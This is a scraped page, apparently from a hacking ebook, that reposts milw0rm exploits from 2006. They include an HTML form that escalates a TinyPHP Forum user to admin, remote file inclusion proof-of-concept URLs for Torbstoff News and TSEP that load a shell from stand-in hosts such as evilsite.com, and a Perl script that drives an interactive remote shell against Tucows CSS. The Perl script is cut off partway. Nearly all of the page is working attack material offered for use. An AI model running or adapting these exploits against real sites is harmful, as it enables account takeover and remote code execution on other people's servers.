Hacker Professional Ebook part 434 doc


Document information

{
echo "exploit succeeded \r\n";
$temp=explode("my_delim",$html);
die($temp[1]);
}
//if you are here
echo "exploit failed \r\n";
?>

Black_hat_cr(HCE)

TinyPHP Forum <= 3.6 (makeadmin) Remote Admin Maker Exploit

Code:

TinyPHPForum 3.6 Admin Maker<br>
By SirDarckCat from elhacker.net
<FORM method=post enctype="multipart/form-data">
Existing User:<INPUT name=uname><br>
<INPUT type=file name=userfile style="visibility:HIDDEN"><br>
<INPUT type=hidden name=email value="a@b.c">
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit>
</FORM>
<script language="JavaScript">
document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php";
</script>

# milw0rm.com [2006-08-02]

vns3curity(HCE)

Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability

Code:

#=================================================================
#Torbstoff News 4 <= (pfad) Remote File Inclusion Exploit
#=================================================================
# |
#Critical Level : Dangerous |
# |
#Vendor site : http://www.torbstoff.de |
# |
#Version : 4 |
# |
#=================================================================
#
#Dork: "Torbstoff News 4"
#
#=================================================================
#Bug in : news.php
#
#Vlu Code :
#
# include($pfad . "includes/config.inc.php");
#
#=================================================================
#
#Exploit :
#
#
#http://sitename.com/[Script Path]/news.php?pfad=http://SHELLURL.COM?
#
#=================================================================
#Discovered By : SHiKaA
#
#Contact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================

# milw0rm.com [2006-08-07]

vns3curity(HCE)

TSEP <= 0.942 (copyright.php) Remote Inclusion Vulnerability

Code:

+
+ TSEP 0.9.4.2
+
+
+ Affected Software .: TSEP 0.9.4.2
+ Vendor : http://www.tsep.info/
+ Class : Remote File Inclusion
+ Risk : high (Remote File Execution)
+ Found by : Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact : webmaster[at]bb-pcsecurity[.]de
+
+
+ Code /include/copyright.php:
+
+ <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?>
+
+ $tsep_config["absPath"] is not properly sanitized before being used
+
+ Solution:
+ Include config-File in copyright.php
+
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/include/tsepversion.txt
+
+ http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls
+
+ Greets:
+ Krini Gonzales (5 YEARS :P)
+
+ [ E O F ]

# milw0rm.com [2006-08-01]

vns3curity(HCE)

Tucows Client Code Suite (CSS) <= 1.2.1015 File Include Vulnerability

Code:

#!/usr/bin/perl
#Tucows Open Project Remote File Inclusion Vulnerability
#Bug Found & Exploit [c]oded By Dr Max Virus
#Download:http://developer.tucows.com/code/ccs/downloads/ccs-open-1.2.1015-2006-209-1337.zip
use LWP::UserAgent;
$target=@ARGV[0];
$shellsite=@ARGV[1];
$cmdv=@ARGV[2];
if($target!~/http:\/\// || $shellsite!~/http:\/\// || !$cmdv) { usg() }
header();
while()
{
print "[Shell] \$";
while (<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET=>$target.'/libs/tucows/api/cartridges/crt_TUCOWS_domains/lib/domainutils.inc.php?_ENV[TCA_HOME]='.$shellsite='.?&'.$cmdv.'='.$cmd)or die "\n\n Failed to Connect, Try again!\n";
$res = $xpl->request($req);
$info = $res->content;
$info =~ tr/[\n]/[ê]/;
if (!$cmd) {
print "\nEnter a Command\n\n";
$info ="";
}

Posted: 04/07/2014, 12:20
